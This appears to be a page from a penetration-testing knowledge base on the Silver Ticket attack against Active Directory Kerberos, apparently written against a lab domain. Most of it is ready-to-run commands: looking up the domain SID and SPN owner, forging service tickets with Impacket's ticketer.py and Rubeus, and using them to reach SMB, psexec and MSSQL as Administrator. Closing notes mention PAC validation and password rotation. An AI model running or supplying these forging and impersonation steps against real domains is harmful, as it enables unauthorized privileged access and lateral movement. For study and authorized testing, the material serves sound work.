Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Service Principals / Techniques

Silver Ticket

Silver Ticket abuse forges a service ticket for one SPN using the key of the account that owns that SPN. The KDC is not contacted when the forged TGS is presented to the service, so the important inputs are the service account key, the SPN, the domain SID, and the identity we want to claim inside the PAC.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export SID='S-1-5-21-1111111111-2222222222-3333333333'
export SPN='cifs/ws01.ootw.local'

Get domain SID

lookupsid.py "ootw.local/student:student@10.10.10.200" 0
nxc ldap 10.10.10.200 -u student -p 'student' --get-sid

Verify SPN owner

ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" "(servicePrincipalName=$SPN)" sAMAccountName servicePrincipalName objectClass

Forge with Impacket

ticketer.py -nthash SERVICE_NTLM -domain-sid "$SID" -domain "$DOMAIN" -spn "$SPN" Administrator
export KRB5CCNAME=Administrator.ccache
klist

Use CIFS ticket

smbclient.py -k -no-pass "$DOMAIN/Administrator@ws01.ootw.local"
psexec.py -k -no-pass "$DOMAIN/Administrator@ws01.ootw.local"

Use MSSQL ticket

ticketer.py -nthash SQL_SERVICE_NTLM -domain-sid "$SID" -domain "$DOMAIN" -spn "MSSQLSvc/sql01.ootw.local:1433" Administrator
export KRB5CCNAME=Administrator.ccache
mssqlclient.py -k -no-pass "$DOMAIN/Administrator@sql01.ootw.local"

Forge with Rubeus

Rubeus.exe silver /service:cifs/ws01.ootw.local /rc4:SERVICE_NTLM /sid:S-1-5-21-1111111111-2222222222-3333333333 /user:Administrator /domain:ootw.local /ptt

AES option

Rubeus.exe silver /service:cifs/ws01.ootw.local /aes256:SERVICE_AES256 /sid:S-1-5-21-1111111111-2222222222-3333333333 /user:Administrator /domain:ootw.local /ptt

Service selection

cifs/host       SMB, admin shares, PsExec-style movement
HTTP/host       WinRM, IIS, ADCS web, Exchange web
MSSQLSvc/host   SQL Server
ldap/dc         LDAP operations
TERMSRV/host    RDP
HOST/host       generic host-backed services

Notes

  • Silver Tickets are service-scoped.
  • The SPN must match the service we access.
  • The forged ticket must be encrypted with the key of the account that owns the SPN.
  • If the service validates PACs with the KDC, the ticket may fail.
  • Rotating the service account password kills the forged ticket path.